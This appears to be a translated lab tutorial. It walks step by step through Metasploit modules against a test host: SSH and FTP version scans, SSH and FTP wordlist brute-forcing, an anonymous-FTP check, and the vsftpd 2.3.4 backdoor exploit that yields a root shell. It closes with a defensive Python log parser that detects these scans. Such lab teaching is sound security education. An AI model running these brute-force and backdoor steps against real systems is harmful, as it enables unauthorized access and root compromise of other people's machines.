1. Gathering information over the SSH protocol
Check the SSH service version
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it
with setg RHOSTS x.x.x.x

       =[ metasploit v6.3.55-dev                          ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    22               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)
   TIMEOUT  30               yes       Timeout for the SSH probe

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run
SSH brute force
msf6 auxiliary(scanner/ssh/ssh_version) > back
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
- Because the wordlist does not contain the credentials of our target account, we append them to the file by hand so that the effect can be demonstrated; open a new terminal window for this.
- Setting the wordlist: the default wordlist does not meet real-world needs, and we will use stronger wordlists later on.
Note:
- First append the user/password line below, then re-run the module.
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
Back in the MSF console
msf6 auxiliary(scanner/ssh/ssh_login) > run
2. Gathering information over the FTP protocol
2.1 Check the FTP service version
Load the FTP version scanner module
msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/ftp/ftp_version
Check the module settings
msf6 auxiliary(scanner/ftp/ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.
Set the target IP (more than one can be given)
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180
Start the scan by entering exploit or run
msf6 auxiliary(scanner/ftp/ftp_version) > run
- We can see that the scan result is: vsFTPd 2.3.4
Leave the module
msf6 auxiliary(scanner/ftp/ftp_version) > back
msf6 >
With the FTP service version identified, we can search for that version number to see whether a usable module exists (or search for vsftpd)
msf6 > search 2.3.4

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   1  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   2  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   3  exploit/unix/http/zivif_ipcheck_exec                      2017-09-01       excellent  Yes    Zivif Camera iptest.cgi Blind Remote Command Execution
   4  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/oscommerce_installer_unauth_code_exec

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 >
- An exploit module exists: this version of the FTP service contains a backdoor
So let's try that module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
We got a shell, and it runs as root, so let's try a few commands
Run id to check the current user
Run ifconfig to check the IP address
2.2 FTP anonymous login scan [just get on with it]
- This is really nothing more than using the module for that weakness
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options

Module options (auxiliary/scanner/ftp/anonymous):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run
2.3 FTP brute force
The only step that differs from the SSH brute force is the module loaded: the FTP login module
msf6 auxiliary(scanner/ftp/anonymous) > back
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST      false            no        Record anonymous/guest logins to the database
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             21               yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
Finally, just run it.
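As a defensive counterpart to the SSH brute force in section 1 and the FTP anonymous-login and brute-force scans in section 2, here is an added example (written for this page, not code from the original post or from Metasploit) that parses constructed auth.log and vsftpd.log lines and flags the traces such scans leave on the target: a burst of failed logins from one source, a successful login from that source right after the burst (the wordlist hit), and anonymous FTP logins. The sample lines, IP addresses and the failure threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines (assumptions, not from the page) imitating OpenSSH entries in
# /var/log/auth.log and vsftpd entries in /var/log/vsftpd.log.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:02 target sshd[2101]: Failed password for invalid user admin from 192.168.1.50 port 51000 ssh2
Mar  3 10:01:03 target sshd[2102]: Failed password for root from 192.168.1.50 port 51001 ssh2
Mar  3 10:01:03 target sshd[2103]: Failed password for root from 192.168.1.50 port 51002 ssh2
Mar  3 10:01:05 target sshd[2105]: Accepted password for msfadmin from 192.168.1.50 port 51004 ssh2
Mar  3 10:05:00 target sshd[2150]: Failed password for root from 10.0.0.7 port 40000 ssh2
"""
SAMPLE_VSFTPD_LOG = """\
Mon Mar  3 10:02:10 2025 [pid 3001] [anonymous] OK LOGIN: Client "192.168.1.50", anon password "mozilla@example.com"
Mon Mar  3 10:02:11 2025 [pid 3002] [root] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  3 10:02:11 2025 [pid 3003] [root] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  3 10:02:12 2025 [pid 3004] [msfadmin] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  3 10:02:12 2025 [pid 3005] [msfadmin] OK LOGIN: Client "192.168.1.50"
"""

# One regex per log format; both capture the result, the user name and the client IP.
SSH_RE = re.compile(r'sshd\[\d+\]: (?P<result>Failed|Accepted) \w+ for (?:invalid user )?'
                    r'(?P<user>\S+) from (?P<ip>\S+) port')
FTP_RE = re.compile(r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse_events(text, pattern, service):
    """Yield (service, ip, user, success) for every login line that matches pattern."""
    for line in text.splitlines():
        m = pattern.search(line)
        if m:
            yield service, m.group("ip"), m.group("user"), m.group("result") in ("Accepted", "OK")

def analyze(auth_log, vsftpd_log, threshold=3):
    """Walk both logs in order and report the traces a login scanner leaves behind."""
    events = list(parse_events(auth_log, SSH_RE, "ssh")) + list(parse_events(vsftpd_log, FTP_RE, "ftp"))
    failures = Counter()           # (service, ip) -> failed attempts seen so far
    hits, anonymous = [], []
    for service, ip, user, success in events:
        key = (service, ip)
        if not success:
            failures[key] += 1
        elif service == "ftp" and user == "anonymous":
            anonymous.append(ip)   # anonymous login allowed: what scanner/ftp/anonymous reports
        elif failures[key] >= threshold:
            hits.append((service, ip, user))  # a valid credential found right after a failure burst
    brute = {k: n for k, n in failures.items() if n >= threshold}
    return {"brute_force": brute, "credential_hits": hits, "anonymous_ftp": anonymous}

if __name__ == "__main__":
    print(analyze(SAMPLE_AUTH_LOG, SAMPLE_VSFTPD_LOG))
```

On the sample data both services show three failures from 192.168.1.50 followed by a successful msfadmin login, which is exactly the footprint of the root_userpass.txt run above; the vsftpd FAIL LOGIN lines are what the ftp_login module produces, while an OK LOGIN for anonymous is what the anonymous scanner finds.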